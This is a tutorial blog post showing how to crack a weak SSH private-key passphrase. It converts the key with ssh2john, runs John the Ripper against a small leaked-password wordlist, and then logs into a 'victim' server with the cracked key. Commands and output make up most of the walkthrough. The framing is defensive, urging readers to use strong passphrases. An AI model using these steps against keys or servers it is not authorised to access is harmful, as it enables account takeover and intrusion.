Crack SSH Private Key with John the Ripper
by Anastasis Vasileiadis
The SSH private key code should not be just a decoration. Unfortunately, some people think they will never lose their SSH private key and neglect to use a strong password.
In the guide 10 simple steps for a secure SSH we saw the SSH (from Secure Shell) protocol which is used for secure (encrypted) connections with remote computers / servers. It is used not only to execute commands in the server's terminal but also to transfer files to and from the server (e.g. with FileZilla to transfer files to the Server) or even to transfer audio via ssh.
So you understand from the above its “power” and how important it is to have a secure ssh. Unfortunately, some do not realize the seriousness of the issue and sufferers of the “will it happen to me?” syndrome. Servers become the pawns of the FritzFrog Botnet |Attacks on SSH servers by a sophisticated peer-to-peer (P2P) botnet that compromises SSH servers.
As for the SSH code and what a strong password is, you don't need to be educated, three or four simple words joined by punctuation marks is a good and secure model for passwords and passwords.
Just make sure you remember the password. So in the following scenario, we'll see what happens if you haven't dealt with it in the first 10 minutes on a new Server with Basic security settings, or you managed to lose your SSH private key to which you had put an easy code.
Install SSH2John on your computer
SSH2John is If you do not have the Jumbo version of John the Ripper installed, you will need to download ssh2john from GitHub, as it is not included on Kali Linux. If you don't have John the Ripper installed, you can learn how to install it from his GitHub.
We open a terminal and download it:
~# wget
https://raw.githubusercontent.com/magnumripper/JohnTh
eRipper/bleeding-jumbo/run/ssh2john.py
--2020-09-01 12:26:03--
https://raw.githubusercontent.com/magnumripper/JohnTh
eRipper/bleeding-jumbo/run/ssh2john.py
HTTP request sent, waiting for response... 200 OK
Length: 7825 (7.6K) [text/plain]
Saving to: 'ssh2john.py'
ssh2john.py 100%[=======================>] 7.64K --.-
KB/s in 0s
Now let's crack the SSH private Key.
Crack the private key
All we need to do is run the ssh2john tool against the private key and redirect the results to a new hash file using:
python ssh2john.py id_rsa > id_rsa.hash
Next, we'll use it John the ripper to crack the password. But first, we need a proper word list. For the purposes of this guide, we will use a small one that has 100 words to show how to do it in a simple way. Download it:
~# wget
https://raw.githubusercontent.com/danielmiessler/SecL
ists/master/Passwords/darkweb2017-top100.txt
Now run John on Kali Linux as usual, feeding it the wordlist and hash file:
john --wordlist=darkweb2017-top100.txt id_rsa.hash
Note: This format may emit false positives, so it
will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key
for status
1q2w3e4r5t (id_rsa)
Session completed
We can see that it recognized our password, but to be sure, let's use the command –show to verify it:
john --show id_rsa.hash
id_rsa:1q2w3e4r5t
1 password hash cracked, 0 lef
As you can see, even 1q2w3e4r5t what to the common eye may seem hard to crack...unfortunately for you who use it...is a matter of vocabulary.
SSH access to the victim
With the key broken, all that remains is to use it against the target for which the particular key is being used. Using the option -i in the SSH command, we can specify the private key to use for authentication:
ssh -i id_rsa [email protected]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT
accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
[email protected]'s password
It won't let us use the key if the permissions are too ... loose. So all we have to do is set some stricter permissions to use the private key:
chmod 400 id_rsa
Now we are able to connect. Then, we enter the password that we
have cracked, and the message shows that we are connected:
~# ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Last login: Tue Sep 1 15:20:16 2020 from 10.10.10.1
[email protected]:~$
Epilogue
In this short guide, we have seen how one can crack SSH passwords.
In most cases these are done massively and automatically and SSH keys are broken like lettuce leaves if we do not pay attention to the overall security of our system, and we have the illusion that since we have a Linux Server we are safe. As you may have read in Enough with the FUD about Linux security holes, you will understand that security is not an end product but an ongoing process.
Author
Latest Articles
New Edition
